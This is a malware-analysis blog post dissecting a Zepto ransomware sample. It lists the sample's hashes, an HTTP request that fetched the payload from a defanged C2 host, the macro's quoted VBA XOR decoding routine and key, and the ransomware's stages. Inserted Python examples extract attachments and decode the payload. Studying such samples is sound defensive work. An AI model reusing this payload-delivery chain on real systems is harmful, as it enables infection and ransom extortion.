Zepto Ransomware Diagram How-To

I really wanted to find a fresh malware sample to analyze and to demonstrate how I usually make malware diagrams. I trawled virustotal.com and found a recently uploaded email (uploaded 9/4/2016, originally delivered 8/11/2016). I had no idea what malware it carried, so it was an adventure. Here are the details of all files involved:

Email: c2ef6192f6c1f163ed69a7c5659afb90
Attachment: a44130159570d9aef99796023b2614be (NewXDocX879-2.docm)
ZeptoPayload: d9a87bd83afcd5cbf6c5fcc4123bbdb1e9d30302 (turbis.exe)

Zepto ransomware is actually a derivative of Locky. There are already many great blogs about both types of ransomware. Hopefully this video is helpful in malware diagram creation 🙂

Diagram How-To Video

Get Icons here: https://www.iconfinder.com

Email Extraction

How to extract the attachment from an eml file. First install mpack:
  $ sudo apt-get install mpack
Then extract the eml contents:
  $ munpack youremail.eml
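The same extraction in Python, as an added example that is not part of the original post: it uses the standard library email module instead of munpack, saves each attachment under its bare file name, flags macro-enabled Office extensions, and prints the MD5 so it can be matched against the hashes listed above. The sample message embedded in the script is constructed for the demo; the attachment name reuses the one from the post, but its content is only the bytes "abc", not a real document.

```python
"""Pull attachments out of a .eml file and hash them (added example).

Does in Python what the post does with munpack. The sample message
below is constructed for the demo: the attachment name is the one from
the post, but its content is only the bytes "abc", not a real document.
"""
import email
import hashlib
import os
import sys
from email import policy
from pathlib import Path

# Office extensions that can carry VBA macros (the "m" formats)
MACRO_EXTENSIONS = {".docm", ".dotm", ".xlsm", ".xltm", ".pptm", ".potm"}

# Constructed sample mail: one text body plus one base64 attachment ("abc")
SAMPLE_EML = b"""\
From: sender@example.invalid
To: recipient@example.invalid
Subject: Document
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="BOUNDARY"

--BOUNDARY
Content-Type: text/plain

Please see attached.

--BOUNDARY
Content-Type: application/vnd.ms-word.document.macroEnabled.12
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="NewXDocX879-2.docm"

YWJj
--BOUNDARY--
"""


def is_macro_enabled(filename: str) -> bool:
    """True when the extension is one of the macro-capable Office formats."""
    return Path(filename).suffix.lower() in MACRO_EXTENSIONS


def extract_attachments(eml_bytes: bytes):
    """Return [(filename, content, md5_hex)] for every MIME part that has a filename."""
    msg = email.message_from_bytes(eml_bytes, policy=policy.default)
    found = []
    for part in msg.walk():
        if part.get_content_maintype() == "multipart":
            continue
        name = part.get_filename()
        if not name:
            continue  # message body, not an attachment
        # Keep only the base name so a crafted filename= header with
        # directory components (either slash style) cannot steer the write.
        safe_name = os.path.basename(name.replace("\\", "/"))
        content = part.get_payload(decode=True)  # undoes base64 / quoted-printable
        found.append((safe_name, content, hashlib.md5(content).hexdigest()))
    return found


def save_attachments(eml_path: Path, out_dir: Path):
    """Write each attachment into out_dir; return (name, md5, macro_enabled) rows."""
    out_dir.mkdir(parents=True, exist_ok=True)
    rows = []
    for name, content, digest in extract_attachments(eml_path.read_bytes()):
        (out_dir / name).write_bytes(content)
        rows.append((name, digest, is_macro_enabled(name)))
    return rows


if __name__ == "__main__":
    if len(sys.argv) == 3:
        rows = save_attachments(Path(sys.argv[1]), Path(sys.argv[2]))
    else:  # no arguments: run on the constructed sample instead
        rows = [(n, d, is_macro_enabled(n)) for n, _, d in extract_attachments(SAMPLE_EML)]
    for name, digest, macro in rows:
        print(f"{digest}  {name}{'  [macro-enabled]' if macro else ''}")
```

Run as `python extract_eml.py youremail.eml out/` to write the attachments into `out/`; with no arguments it processes the constructed sample and prints the MD5 of the "abc" attachment.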


Attachment

a44130159570d9aef99796023b2614be  (NewXDocX879-2.docm)
Seeing that this extension is "docm" tells us this lovely document is using VBA macros. A .docm is an OOXML zip archive, so using 7zip you can unzip the document container and see its contents. vbaProject.bin is the VBA macro storage we want to look at, so let's use the Python package oletools (its olevba tool) to extract the macro code.

Payload Download

How to get the traffic fast:

HTTP Request

http://iceninegr[.]web[.]fc2[.]com/4GBrdf6
GET /4GBrdf6 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: iceninegr[.]web[.]fc2[.]com
Connection: Keep-Alive

Encrypted Turbis Exe

Decoding function in the VBA macro

UNDOPRYXOR GromGremitKustiTryasutsyaUUUKABBB, GromGremitKustiTryasutsyaUUUKA, "1DewxHpdrG2Xe2xWVa1XwFG6hJ1Cti30"

which points to:

Public Sub DecryptByte(ByteArray() As Byte, Key As String)
  Dim Offset As Long
  Dim ByteLen As Long
  Dim ResultLen As Long
  Dim CurrPercent As Long
  Dim NextPercent As Long
  Dim m_Key() As Byte
  Dim m_KeyLen As Long

  ' Key string converted to a single-byte array of length Len(Key)
  m_KeyLen = Len(Key)
  ReDim m_Key(m_KeyLen)
  m_Key = StrConv(Key, vbFromUnicode)

  ByteLen = UBound(ByteArray) + 1
  ResultLen = ByteLen
  ' Repeating-key XOR: each byte is XORed with the key byte at (Offset Mod m_KeyLen)
  For Offset = 0 To (ByteLen - 1)
    ByteArray(Offset) = ByteArray(Offset) Xor m_Key(Offset Mod m_KeyLen)
    ' Progress-percentage bookkeeping; it never changes the output
    If (Offset >= NextPercent) Then
      CurrPercent = Int((Offset / ResultLen) * 100)
      NextPercent = (ResultLen * ((CurrPercent + 1) / 100)) + 1
    End If
  Next
End Sub

Decryption Key

"1DewxHpdrG2Xe2xWVa1XwFG6hJ1Cti30"

Write a simple Python script to decode the downloaded blob

Download it here

$ python xorbyte_decode > turbis.exe
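A Python re-implementation of the macro's DecryptByte routine, added here as an example; it is not the script the post links to. It mirrors the VBA loop above (each byte XOR the key byte at offset mod key length) using the key quoted from the macro and, because XOR is its own inverse, the same function both encodes and decodes. It also checks the result for the MZ/PE markers, which is the quickest way to tell a wrong key from a right one. The input and output file paths are placeholders, and the self-check at the bottom uses a constructed fake PE header rather than the real payload.

```python
"""Repeating-key XOR decoder mirroring the macro's DecryptByte (added example).

Not the post's own script. KEY is the one quoted from the macro; the
file paths are placeholders supplied on the command line.
"""
import sys
from pathlib import Path

KEY = "1DewxHpdrG2Xe2xWVa1XwFG6hJ1Cti30"  # key passed to DecryptByte in the macro


def xor_decode(data: bytes, key: str = KEY) -> bytes:
    """ByteArray(i) = ByteArray(i) Xor m_Key(i Mod m_KeyLen), for every i."""
    # StrConv(Key, vbFromUnicode) turns the VBA string into single bytes
    key_bytes = key.encode("latin-1")
    return bytes(b ^ key_bytes[i % len(key_bytes)] for i, b in enumerate(data))


def looks_like_pe(data: bytes) -> bool:
    """Sanity check on the output: a Windows executable starts with 'MZ'
    and has the 'PE\\0\\0' signature at the offset stored at 0x3C.
    A wrong key leaves neither marker in place."""
    if len(data) < 0x44 or data[:2] != b"MZ":
        return False
    pe_off = int.from_bytes(data[0x3C:0x40], "little")
    return data[pe_off:pe_off + 4] == b"PE\x00\x00"


def decode_file(src: Path, dst: Path, key: str = KEY) -> bool:
    """Decode src into dst; return whether the result looks like a PE file."""
    decoded = xor_decode(src.read_bytes(), key)
    dst.write_bytes(decoded)
    return looks_like_pe(decoded)


def demo_roundtrip() -> bool:
    """Constructed self-test: a minimal fake PE header is XOR-encoded with the
    key (hiding the MZ/PE markers) and then decoded back, as the macro would."""
    fake = bytearray(0x44)
    fake[0:2] = b"MZ"
    fake[0x3C:0x40] = (0x40).to_bytes(4, "little")  # e_lfanew -> 0x40
    fake[0x40:0x44] = b"PE\x00\x00"
    fake = bytes(fake)
    encoded = xor_decode(fake)      # the same operation encodes...
    decoded = xor_decode(encoded)   # ...and decodes
    return (not looks_like_pe(encoded)) and looks_like_pe(decoded) and decoded == fake


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("usage: xorbyte_decode.py <downloaded_blob> <output.exe>")
        print("self-test:", "ok" if demo_roundtrip() else "FAILED")
        sys.exit(0)
    if decode_file(Path(sys.argv[1]), Path(sys.argv[2])):
        print("decoded output looks like a PE file")
    else:
        print("WARNING: output has no MZ/PE signature; check the key")
```

Usage: `python xorbyte_decode.py 4GBrdf6 turbis.exe` decodes the blob fetched in the HTTP request above; run with no arguments to exercise the built-in self-test only.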

Zepto Payload

d9a87bd83afcd5cbf6c5fcc4123bbdb1e9d30302   turbis.exe
ZeptoRansomware
  1. Payload is downloaded from its C&C repo using WScript.Shell
  2. Payload turbis.exe is XOR-decoded and saved in %TEMP%
  3. Registry keys are set up for persistence and encryption
  4. A new thread containing shellcode is executed, where all communication is through COM objects in a memory channel
  5. Posts to the C&C server to report the compromise and the encryption key
  6. Begins to recursively encrypt files on the system
  7. Places a ransom note in each leaf folder and displays the ransom notes